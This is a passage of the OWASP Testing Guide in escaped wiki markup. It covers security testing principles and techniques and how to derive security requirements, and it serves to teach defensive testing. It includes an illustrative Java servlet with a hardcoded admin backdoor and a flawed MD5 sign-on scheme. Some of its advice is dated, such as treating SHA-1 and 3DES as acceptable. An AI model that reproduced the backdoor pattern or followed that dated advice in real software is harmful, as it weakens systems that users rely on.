&amp;lt;br&amp;gt;&lt;br /&gt;
'''Test Early and Test Often'''&amp;lt;br&amp;gt;&lt;br /&gt;
When a bug is detected early within the SDLC, it can be addressed more quickly and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA organizations about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages might help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of those that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Scope of Security'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., Confidential, Secret, Top Secret). Discussions should occur with legal council to ensure that any specific security need will be met. In the USA they might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives might apply. For example, Directive 96/46/EC4 [10] makes it mandatory to treat personal data in applications with due care, whatever the application. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop the Right Mindset'''&amp;lt;br&amp;gt;&lt;br /&gt;
Successfully testing an application for security vulnerabilities requires thinking &amp;quot;outside of the box.&amp;quot; Normal use cases will test the normal behavior of the application when a user is using it in the manner that you expect. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find what assumptions made by web developers are not always true and how they can be subverted. This is one of the reasons why automated tools are actually bad at automatically testing for vulnerabilities: this creative thinking must be done on a case-by-case basis and most web applications are being developed in a unique way (even if using common frameworks). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Subject'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, and more should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use the Right Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. It is important to understand exactly what these tools can and cannot do, however, so that they are not oversold or used incorrectly. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The Devil is in the Details'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positive that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use Source Code When Available'''&amp;lt;br&amp;gt;&lt;br /&gt;
While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in production, they are not the most effective way to secure an application. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop Metrics'''&amp;lt;br&amp;gt;&lt;br /&gt;
An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. These metrics can show if more education and training are required, if there is a particular security mechanism that is not clearly understood by development, and if the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations might be a good head start.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Document the Test Results'''&amp;lt;br&amp;gt;&lt;br /&gt;
To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they ware performed, and details of the test findings. It is wise to agree on an acceptable format for the report which is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance. The report must be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report must be clear to the developer in pin-pointing the exact function that is affected by the vulnerability, with associated recommendations for resolution in a language that the developer will understand (no pun intended). Last but not least, the report writing should not be overly burdensome on the security tester themselves; security testers are not generally renowned for their creative writing skills, therefore agreeing on a complex report can lead to instances where test results do not get properly documented.&lt;br /&gt;
&lt;br /&gt;
==Testing Techniques Explained==&lt;br /&gt;
&lt;br /&gt;
This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques, although Chapter 3 will address this information. This section is included to provide context for the framework presented in the next hapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:&lt;br /&gt;
* Manual Inspections &amp;amp; Reviews &lt;br /&gt;
* Threat Modeling &lt;br /&gt;
* Code Review &lt;br /&gt;
* Penetration Testing &lt;br /&gt;
&lt;br /&gt;
=== Manual Inspections &amp;amp; Reviews ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual inspections are human-driven reviews that typically test the security implications of the people, policies, and processes, but can include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. By asking someone how something works and why it was implemented in a specific way, it allows the tester to quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews we suggest you adopt a trust-but-verify model. Not everything everyone tells you or shows you will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Requires no supporting technology &lt;br /&gt;
* Can be applied to a variety of situations&lt;br /&gt;
* Flexible &lt;br /&gt;
* Promotes teamwork &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Can be time consuming &lt;br /&gt;
* Supporting material not always available &lt;br /&gt;
* Requires significant human thought and skill to be effective!&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Threat modeling has become a popular technique to help system designers think about the security threats that their systems/applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: &lt;br /&gt;
* Decomposing the application – understand, through a process of manual inspection, how the application works, its assets, functionality, and connectivity. &lt;br /&gt;
* Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. &lt;br /&gt;
* Exploring potential vulnerabilities - whether technical, operational, or management. &lt;br /&gt;
* Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees.&lt;br /&gt;
* Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic. The output from a threat model itself can vary but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for the testing applications for potential security flaws in the design of the application. There is no right or wrong way to develop threat models and perform information risk assessments on applications. [12]. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Practical attacker's view of the system &lt;br /&gt;
* Flexible &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages: &amp;lt;br&amp;gt;'''&lt;br /&gt;
* Relatively new technique &lt;br /&gt;
* Good threat models don’t automatically mean good software&lt;br /&gt;
&lt;br /&gt;
=== Source Code Review ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Source code review is the process of manually checking a web application's source code for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes “if you want to know what’s really going on, go straight to the source.&amp;quot; Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find implementation issues such as places where input validation was not performed or when fail open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein [13].&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Completeness and effectiveness &lt;br /&gt;
* Accuracy &lt;br /&gt;
* Fast (for competent reviewers) &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Requires highly skilled security developers &lt;br /&gt;
* Can miss issues in compiled libraries &lt;br /&gt;
* Cannot detect run-time errors easily &lt;br /&gt;
* The source code actually deployed might differ from the one being analyzed&lt;br /&gt;
&lt;br /&gt;
'''For more on code review, checkout the [[OWASP Code Review Project|OWASP code review project]]'''.&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Penetration Testing ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely, without knowing the inner workings of the application itself, to find security vulnerabilities. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but, again, with the nature of web applications their effectiveness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Can be fast (and therefore cheap) &lt;br /&gt;
* Requires a relatively lower skill-set than source code review &lt;br /&gt;
* Tests the code that is actually being exposed &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Too late in the SDLC &lt;br /&gt;
* Front impact testing only!&lt;br /&gt;
&lt;br /&gt;
=== The Need for a Balanced Approach ===&lt;br /&gt;
With so many techniques and so many approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them.&lt;br /&gt;
Experience shows that there is no right or wrong answer to exactly what techniques should be used to build a testing framework. The fact remains that all techniques should probably be used to ensure that all areas that need to be tested are tested. What is clear, however, is that there is no single technique that effectively covers all security testing that must be performed to ensure that all issues have been addressed. Many companies adopt one approach, which has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested, and is simply “too little too late” in the software development life cycle (SDLC). &lt;br /&gt;
The correct approach is a balanced one that includes several techniques, from manual interviews to technical testing. The balanced approach is sure to cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. &lt;br /&gt;
Of course there are times and circumstances where only one technique is possible; for example, a test on a web application that has already been created, and where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, we encourage the testing parties to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. &lt;br /&gt;
A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. However, it is recommended that a balanced testing framework look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionSDLC.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 3: Proportion of Test Effort in SDLC''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The following figure shows a typical proportional representation overlaid onto testing techniques. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionTest.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 4: Proportion of Test Effort According to Test Technique''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''A Note about Web Application Scanners'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, we want to highlight some fundamental issues about why we do not believe that automating black box testing is (or will ever be) effective. By highlighting these issues, we are not discouraging web application scanner use. Rather, we are saying that their limitations should be understood, and testing frameworks should be planned appropriately.&lt;br /&gt;
NB: OWASP is currently working to develop a web application scanner-benchmarking platform. The following examples indicate why automated black box testing is not effective. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 1: Magic Parameters'''&amp;lt;br&amp;gt;&lt;br /&gt;
Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET request may be: ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=value&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt; To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now:&amp;lt;br&amp;gt; ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic= sf8g7sfjdsurtsdieerwqredsgnfg8d &amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt;&lt;br /&gt;
Given that all of the other parameters were simple two- and three-characters fields, it is not possible to start guessing combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is up to 30^28 permutations, or trillions of HTTP requests! That is an electron in a digital haystack! &lt;br /&gt;
The code for this exemplar Magic Parameter check may look like the following: &amp;lt;br&amp;gt;&lt;br /&gt;
 public void doPost( HttpServletRequest request, HttpServletResponse response) &lt;br /&gt;
 { &lt;br /&gt;
 String magic = “sf8g7sfjdsurtsdieerwqredsgnfg8d”; &lt;br /&gt;
 boolean admin = magic.equals( request.getParameter(“magic”));&lt;br /&gt;
 if (admin) doAdmin( request, response); &lt;br /&gt;
 else …. // normal processing &lt;br /&gt;
 } &lt;br /&gt;
By looking in the code, the vulnerability practically leaps off the page as a potential problem. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 2: Bad Cryptography'''&amp;lt;br&amp;gt;&lt;br /&gt;
Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: ''Hash { username : date }'' &amp;lt;br&amp;gt;&lt;br /&gt;
When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP re-direct. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. Clearly, as we explain the scheme, the inadequacies can be worked out, and it can be seen how anyone that figures it out (or is told how it works, or downloads the information from Bugtraq) can login as any user. Manual inspection, such as an interview, would have uncovered this security issue quickly, as would inspection of the code. A black-box web application scanner would have seen a 128-bit hash that changed with each user, and by the nature of hash functions, did not change in any predictable way.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''A Note about Static Source Code Review Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, we want to highlight some fundamental issues about why we do not believe this approach is effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors, however significant manual effort is required to validate the findings. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Requirements Test Derivation==&lt;br /&gt;
If you want to have a successful testing program, you need to know what the objectives of the testing are. These objectives are specified by security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations and positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.&lt;br /&gt;
&lt;br /&gt;
'''Testing Objectives'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the objectives of security testing is to validate that security controls function as expected. This is documented via ''security requirements'' that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service.  The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the [[OWASP Top Ten]], as well as vulnerabilities that are previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration test. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Documentation'''&amp;lt;br&amp;gt;&lt;br /&gt;
The first step in the documentation of security requirements is to understand the ''business requirements''. A business requirement document could provide the initial, high-level information of the expected functionality for the application. For example, the main purpose of an application may be to provide financial services to customers or shopping and purchasing goods from an on-line catalogue. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.&lt;br /&gt;
&lt;br /&gt;
A general checklist of the applicable regulations, standards, and policies serves well the purpose of a preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country/state where the application needs to function/operate. Some of these compliance guidelines and regulations might translate in specific technical requirements for security controls. For example, in the case of financial applications, the compliance with FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security control and multi factor authentication. &lt;br /&gt;
&lt;br /&gt;
Applicable industry standards for security need also to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, the compliance with the PCI DSS [16] standard forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic strip data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis.&lt;br /&gt;
&lt;br /&gt;
Another section of the checklist needs to enforce general requirements for compliance with the organization information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such requirement can be: &amp;quot;a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.&amp;quot; When security requirements map to compliance rules a security test can validate the exposure of compliance risks. If violation with information security standards and policies are found, these will result in a risk that can be documented and that the business has to deal with (i.e., manage). For this reason, since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Validation'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the functionality perspective, the validation of security requirements is the main objective of security testing, while, from the risk management perspective, this is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. More in depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personal identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization encryption standards. These might require that only certain algorithms and key lengths could be used. For example, a security requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-1, RSA, 3DES) with allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption).&lt;br /&gt;
&lt;br /&gt;
From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing/validation. &lt;br /&gt;
&lt;br /&gt;
Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.  Considering the security test for a SQL injection vulnerability, for example, a black box test might involve first a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis till the malicious query is executed. Assuming the tester has the source code, she might learn from the source code analysis on how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to unauthorized user).&lt;br /&gt;
&lt;br /&gt;
'''Threats and Countermeasures Taxonomies'''&amp;lt;br&amp;gt;&lt;br /&gt;
A ''threat and countermeasure classification'' that takes into consideration root causes of vulnerabilities is the critical factor to verify that security controls are designed, coded, and built so that the impact due to the exposure of such vulnerabilities is mitigated. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. More specifically, the web application security frame [17] provides a classification (e.g. taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18], for example, as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.&lt;br /&gt;
&lt;br /&gt;
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding such as secure coding standards. An example of a common coding error in authentication controls consists of applying an hash function to encrypt a password, without applying a seed to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication with a vulnerability root cause in a coding error. Since the root cause is insecure coding the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.&lt;br /&gt;
&lt;br /&gt;
'''Security Testing and Risk Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security requirements need to take into consideration the severity of the vulnerabilities to support a ''risk mitigation strategy''. Assuming that the organization maintains a repository of vulnerabilities found in applications, i.e., a vulnerability knowledge base, the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found.  Such a vulnerability knowledge base can also be used to establish a metrics to analyze the effectiveness of the security tests throughout the SDLC.&lt;br /&gt;
 &lt;br /&gt;
For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerability type. The exposure of such vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database and mitigate the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk can be fixed in further releases.&lt;br /&gt;
&lt;br /&gt;
By considering the threat scenarios exploiting common vulnerabilities it is possible to identify potential risks for which the application security control needs to be security tested. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identify theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization vulnerability knowledge base can be used to derive security risk driven tests cases to validate the most likely attack scenarios. For example if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.&lt;br /&gt;
&lt;br /&gt;
===Functional and Non Functional Test Requirements===&lt;br /&gt;
'''Functional Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need of a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests.&lt;br /&gt;
Examples of positive requirements are: “the application will lockout the user after six failed logon attempts” or “passwords need to be six min characters, alphanumeric”. The validation of positive requirements consists of asserting the expected functionality and, as such, can be tested by re-creating the testing conditions, and by running the test according to predefined inputs and by asserting the expected outcome as a fail/pass condition.&lt;br /&gt;
&lt;br /&gt;
In order to validate security requirements with security tests, security requirements need to be function driven and highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:&lt;br /&gt;
*Protect user credentials and shared secrets in transit and in storage&lt;br /&gt;
*Mask any confidential data in display (e.g., passwords, accounts)&lt;br /&gt;
*Lock the user account after a certain number of failed login attempts &lt;br /&gt;
*Do not show specific validation errors to the user as a result of failed logon &lt;br /&gt;
*Only allow passwords that are alphanumeric, include special characters and six characters minimum length, to limit the attack surface&lt;br /&gt;
*Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change.&lt;br /&gt;
*The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.&lt;br /&gt;
&lt;br /&gt;
'''Risk Driven Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security tests need also to be risk driven, that is they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. &lt;br /&gt;
Examples of &amp;quot;should not do&amp;quot; (negative) requirements are:&lt;br /&gt;
* The application should not allow for the data to be altered or destroyed&lt;br /&gt;
* The application should not be compromised or misused for unauthorized financial transactions by a malicious user.&lt;br /&gt;
&lt;br /&gt;
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling.&lt;br /&gt;
The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:&lt;br /&gt;
*Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks&lt;br /&gt;
*Encrypt passwords using non reversible encryption such as using a digest (e.g., HASH) and a seed to prevent dictionary attacks&lt;br /&gt;
*Lock out accounts after reaching a logon failure threshold and enforce password complexity to mitigate risk of brute force password attacks&lt;br /&gt;
*Display generic error messages upon validation of credentials to mitigate risk of account harvesting/enumeration&lt;br /&gt;
*Mutually authenticate client and server to prevent non-repudiation and Man In the Middle (MiTM) attacks&lt;br /&gt;
&lt;br /&gt;
Threat modeling artifacts such as threat trees and attack libraries can be useful to derive the negative test scenarios. A threat tree will assume a root attack (e.g., attacker might be able to read other users' messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in mitigating such attacks.&lt;br /&gt;
&lt;br /&gt;
===Security Requirements Derivation Through Use and Misuse Cases===&lt;br /&gt;
Pre-requisite in describing the application functionality is to understand what the application is supposed to do and how. This can be done by describing ''use cases''. Use cases, in the graphical form as commonly used in software engineering, show the interactions of actors and their relations, and help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, and pre- and post-conditions. Similar to use cases, ''misuse and abuse cases'' [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker's point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which of them are the most critical ones and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.&lt;br /&gt;
&lt;br /&gt;
To derive security requirements from use and misuse case [20] , it is important to define the functional scenarios and the negative scenarios, and put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed.&lt;br /&gt;
&lt;br /&gt;
*Step 1: Describe the Functional Scenario: User authenticates by supplying username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.&lt;br /&gt;
&lt;br /&gt;
